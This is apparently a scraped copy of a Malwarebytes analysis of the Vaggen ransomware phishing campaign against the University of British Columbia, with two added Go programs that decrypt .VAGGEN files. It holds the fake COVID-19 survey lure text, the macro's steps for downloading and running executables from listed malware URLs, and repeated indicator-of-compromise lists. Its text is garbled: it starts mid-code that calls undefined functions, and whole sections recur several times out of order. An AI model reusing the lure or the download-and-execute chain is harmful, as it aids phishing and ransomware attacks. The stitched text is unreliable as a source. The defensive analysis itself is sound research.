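// RecoverTree walks root like the malware's own filepath.Walk callback did, but in
// reverse: every *.VAGGEN file whose tag verifies is written back under its
// original name. The ciphertext is kept and nothing is overwritten, so a partial
// or mistaken run is harmless. It returns the recovered paths.
func RecoverTree(root string, key []byte) ([]string, error) {
	var recovered []string
	err := filepath.Walk(root, func(path string, info os.FileInfo, err error) error {
		if err != nil || info.IsDir() || !strings.HasSuffix(path, ".VAGGEN") {
			return err
		}
		blob, err := os.ReadFile(path)
		if err != nil {
			return err
		}
		plain, err := Decrypt(blob, key)
		if err != nil {
			fmt.Fprintf(os.Stderr, "skip %s: %v\n", path, err)
			return nil // keep walking; report, do not touch
		}
		orig := strings.TrimSuffix(path, ".VAGGEN")
		if _, statErr := os.Stat(orig); statErr == nil {
			fmt.Fprintf(os.Stderr, "skip %s: %s already exists\n", path, orig)
			return nil
		}
		if err := os.WriteFile(orig, plain, 0o600); err != nil {
			return err
		}
		recovered = append(recovered, orig)
		return nil
	})
	return recovered, err
}

func main() {
	dir, _ := os.MkdirTemp("", "vaggen-demo")
	defer os.RemoveAll(dir)
	key := []byte(vaggenKey)
	blob, _ := Encrypt([]byte("constructed sample document"), key)
	os.WriteFile(filepath.Join(dir, "thesis.docx.VAGGEN"), blob, 0o600)
	os.WriteFile(filepath.Join(dir, "damaged.txt.VAGGEN"), blob[:len(blob)-1], 0o600) // tag broken
	got, err := RecoverTree(dir, key)
	fmt.Println(got, err)
}
```

Two design choices are worth keeping in any real recovery tool: decrypt to a new file and leave the ciphertext in place until the output has been checked, and treat a tag failure as "do nothing" rather than writing whatever came out. With GCM the second point is free, since gcm.Open returns an error instead of plaintext when the key or the data is wrong.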
Using the hardcoded key and a 12-byte nonce generated by CryptGenRandom, the file content is encrypted with the gcm.Seal function.

The content of the output file (with .VAGGEN extension) contains:

the 12-byte nonce
the encrypted content
the 16-byte GCM tag

The hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take my heart my money”.
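With the layout (12-byte nonce, ciphertext, 16-byte GCM tag) and the 32-byte key known, recovery is one AES-GCM Open call per file. The following Go program is an added example, not Malwarebytes' decryptor and not the malware's code: RecoverVaggen parses the nonce||ciphertext||tag layout described above and decrypts it with the hardcoded key, and RecoverFile applies that to a .VAGGEN file on disk. It assumes the extension was appended to the original name (doc.txt becomes doc.txt.VAGGEN), and it builds its own sample with the same gcm.Seal call the page names, drawing the nonce from crypto/rand where the sample uses CryptGenRandom.

```go
package main

import (
	"crypto/aes"
	"crypto/cipher"
	"crypto/rand"
	"errors"
	"fmt"
	"os"
	"strings"
)

// vaggenKey is the 32-byte key the page reports as hardcoded in the sample;
// crypto/aes selects AES-256 from the key length.
var vaggenKey = []byte("du_tar_mitt_hjart_mina_pengarna0")

const nonceSize = 12 // standard GCM nonce; the tag (gcm.Overhead()) is 16 bytes

func newGCM() (cipher.AEAD, error) {
	block, err := aes.NewCipher(vaggenKey)
	if err != nil {
		return nil, err
	}
	return cipher.NewGCM(block)
}

// sealLikeVaggen builds a constructed sample in the layout the page describes,
// nonce || ciphertext || tag, with the same gcm.Seal call. The real sample takes
// its nonce from CryptGenRandom; crypto/rand stands in here.
func sealLikeVaggen(plaintext []byte) ([]byte, error) {
	gcm, err := newGCM()
	if err != nil {
		return nil, err
	}
	nonce := make([]byte, nonceSize)
	if _, err := rand.Read(nonce); err != nil {
		return nil, err
	}
	// Seal appends ciphertext||tag to dst; passing the nonce as dst prepends it.
	return gcm.Seal(nonce, nonce, plaintext, nil), nil
}

// RecoverVaggen decrypts the body of one .VAGGEN file with the hardcoded key.
// GCM is authenticated, so a wrong key or a damaged file fails closed.
func RecoverVaggen(encrypted []byte) ([]byte, error) {
	gcm, err := newGCM()
	if err != nil {
		return nil, err
	}
	if len(encrypted) < nonceSize+gcm.Overhead() {
		return nil, errors.New("file too short to hold a nonce and a GCM tag")
	}
	nonce, body := encrypted[:nonceSize], encrypted[nonceSize:]
	plaintext, err := gcm.Open(nil, nonce, body, nil)
	if err != nil {
		return nil, fmt.Errorf("decryption failed (wrong key or corrupted file): %w", err)
	}
	return plaintext, nil
}

// RecoverFile decrypts path (which must end in .VAGGEN) and writes the plaintext
// next to it under the original name, leaving the encrypted copy untouched.
func RecoverFile(path string) (string, error) {
	const ext = ".VAGGEN"
	if !strings.HasSuffix(path, ext) {
		return "", fmt.Errorf("%s: not a %s file", path, ext)
	}
	data, err := os.ReadFile(path)
	if err != nil {
		return "", err
	}
	plaintext, err := RecoverVaggen(data)
	if err != nil {
		return "", fmt.Errorf("%s: %w", path, err)
	}
	out := strings.TrimSuffix(path, ext)
	return out, os.WriteFile(out, plaintext, 0o600)
}

func main() {
	original := []byte("constructed sample document contents")
	enc, err := sealLikeVaggen(original)
	if err != nil {
		panic(err)
	}
	fmt.Printf("%d bytes = %d nonce + %d data + 16 tag\n", len(enc), nonceSize, len(original))
	dec, err := RecoverVaggen(enc)
	fmt.Printf("recovered %q, err=%v\n", dec, err)
	enc[nonceSize] ^= 0x01 // flip one ciphertext bit: the tag check must reject it
	_, err = RecoverVaggen(enc)
	fmt.Println("tampered copy rejected:", err != nil)
}
```

Because GCM is authenticated, Open either returns the exact original bytes or an error: a file that fails the tag check was not produced by this key and layout (a different build, or a file damaged after encryption), so the tool never writes garbage over anything. Keep the .VAGGEN copies until the recovered files have been checked, and treat a tag failure on a whole directory as a sign the variant differs rather than as a reason to retry with tweaks.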
Using this key, we can easily decrypt the content.

With all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that the malware author has not received any payment so far at this Bitcoin address.

Unusually low ransom amount

Based on our findings, we believe this is not a sophisticated threat actor, nor one affiliated with any of the big ransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this attack can be recovered from fairly easily.

However, the phishing attack was well conceived and the template looks well designed, with a nice touch of adding canary tokens. It's unclear at this point if the University of British Columbia was the sole target or not.

Crawling additional repositories created by the threat actor, we found other Word template files that used a very similar macro to drop a coin miner. This raises more questions about the motivation behind this phishing attack.

We are grateful for the information shared with us by the University of British Columbia.
This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2426 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2427 of 
3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2428 of 3467\n\nAccording to UBC, less than a hundred people within a specific department received the link to access the shared\r\ndocument. 
A Box or Dropbox account was required in order to download the file since it was shared privately,\r\ninstead of publicly. This may have been an effort to evade detection or perhaps the attacker expected the target\r\norganization to already be using one of these two sharing services.\r\nPhishing document analysis\r\nThe phishing document uses template injection to download and execute a remote template (template.dotm)\r\nweaponized with a malicious macro. That file was uploaded to a free code hosting website (notabug.org).\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2429 of 3467\n\nWhen the macro is executed, it does the following:\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2430 of 3467\n\nGets the %APPDATA% directory\r\nCreates the Byxor directory in %APPDATA%\r\nDownloads a file from the following url and writes it as Polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nDownloads a file from the following url and writes it as Killar.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\nCalls shell function to execute killar.exe\r\nChecks the output of shell function and whether it was successful (return value would be task Id of\r\nexecuted application)\r\nIf successful, it sends a GET http request to:\r\ncanarytokens.com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\nIf it isn’t successful, it sends a GET http request to:\r\ncanarytokens.com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nWe were able to identify four other variants of the remote templates and payloads. In some of the folders, we\r\nfound several artifacts using Swedish words, which could indicate that the threat actor is familiar with the\r\nlanguage.\r\nOpening the phishing document will trigger a notification via the canarytokens.com website. 
Typically, people use\r\nthis type of service to get alerted for a particular event.\r\nThis can be very useful as an early warning notification system that an intruder has had access to a network. In\r\nthis case, the attacker is probably interested in how many people opened the document and perhaps where they are\r\nfrom.\r\nVaggen ransomware\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2431 of 3467\n\nAfter being deployed, the ransomware starts encrypting the user’s files and adding the .VAGGEN extension to\r\nthem. When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment\r\nequivalent to 80 USD to be paid in Bitcoin.\r\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go\r\nwhich starts with the function denoted as ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG,\r\nmain_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir main_ELDBJORT -\u003e main_encryptFile main_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs can be found here.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2432 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). 
At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2433 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2434 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2435 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2436 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. 
The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2437 of 
3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2438 of 
3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nGood evening gals and guys! [redacted] here, [redacted] manager for [redacted]. I am sharing a\r\nmandatory survey with you that must be completed by Monday. It asks a few questions about how you\r\nbelieve our company responded to the pandemic regarding remote working and much more. 
Please fill\r\nit out ASAP!\r\nYou will also find a form at the end that you can fill out if you need any necessities! Necessities\r\ninclude: gloves, hand sanitizer, masks, or disinfectant spray. We will be providing it to those employees\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2439 of 3467\n\nwho fill out the form for free! Simply sign your initials and put what you need as well as the quantity!\r\nIn advance, we appreciate your feedback! Thanks all! Stay strong! I understand times like this can be\r\ndifficult!\r\nAccording to UBC, less than a hundred people within a specific department received the link to access the shared\r\ndocument. A Box or Dropbox account was required in order to download the file since it was shared privately,\r\ninstead of publicly. This may have been an effort to evade detection or perhaps the attacker expected the target\r\norganization to already be using one of these two sharing services.\r\nPhishing document analysis\r\nThe phishing document uses template injection to download and execute a remote template (template.dotm)\r\nweaponized with a malicious macro. 
That file was uploaded to a free code hosting website (notabug.org).\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2440 of 3467\n\nWhen the macro is executed, it does the following:\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2441 of 3467\n\nGets the %APPDATA% directory\r\nCreates the Byxor directory in %APPDATA%\r\nDownloads a file from the following url and writes it as Polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nDownloads a file from the following url and writes it as Killar.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\nCalls shell function to execute killar.exe\r\nChecks the output of shell function and whether it was successful (return value would be task Id of\r\nexecuted application)\r\nIf successful, it sends a GET http request to:\r\ncanarytokens.com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\nIf it isn’t successful, it sends a GET http request to:\r\ncanarytokens.com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nWe were able to identify four other variants of the remote templates and payloads. In some of the folders, we\r\nfound several artifacts using Swedish words, which could indicate that the threat actor is familiar with the\r\nlanguage.\r\nOpening the phishing document will trigger a notification via the canarytokens.com website. Typically, people use\r\nthis type of service to get alerted for a particular event.\r\nThis can be very useful as an early warning notification system that an intruder has had access to a network. 
In\r\nthis case, the attacker is probably interested in how many people opened the document and perhaps where they are\r\nfrom.\r\nVaggen ransomware\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2442 of 3467\n\nAfter being deployed, the ransomware starts encrypting the user’s files and adding the .VAGGEN extension to\r\nthem. When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment\r\nequivalent to 80 USD to be paid in Bitcoin.\r\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go\r\nwhich starts with the function denoted as ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG,\r\nmain_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir main_ELDBJORT -\u003e main_encryptFile main_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs can be found here.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2443 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2444 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. 
Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2445 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2446 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2447 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. 
This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2448 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2449 of 
3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nThis post was authored by Jérôme Segura with contributions from Hossein Jazi, Hasherezade and Marcelo Rivero.\r\nIn recent weeks, we’ve observed a number of phishing attacks against universities worldwide which we attributed\r\nto the Silent Librarian APT group. 
On October 19, we identified a new phishing document targeting staff at the University of British Columbia (UBC) with a fake COVID-19 survey.\r\nHowever, this attack and its motives are different from the ones previously documented. The survey is a malicious Word document whose purpose is to download ransomware and extort victims in exchange for recovering their encrypted files.\r\nOn discovery, we got in touch with UBC to report our findings. They were already aware of this phishing campaign and were kind enough to share more information with us about the incident. Ultimately, this attack was not successful due to the rapid response of the UBC cybersecurity team.\r\nMandatory COVID-19 survey distributed to targeted recipients\r\nThe attacker created an email address with the mailpoof.com service in order to register accounts with Box.net and DropBox. Rather than directly sending the fake survey via email, the attacker uploaded the document onto Box and DropBox and used the share functionality from these platforms to distribute it.\r\nThis was probably done to evade spam and phishing filters that would have blocked messages coming from a newly registered email address with a low reputation. In comparison, it is much more difficult to detect spam from file sharing services without creating a number of false positives.\r\nThe attacker claimed to be a manager and added the following comment in the file sharing invitation (shared 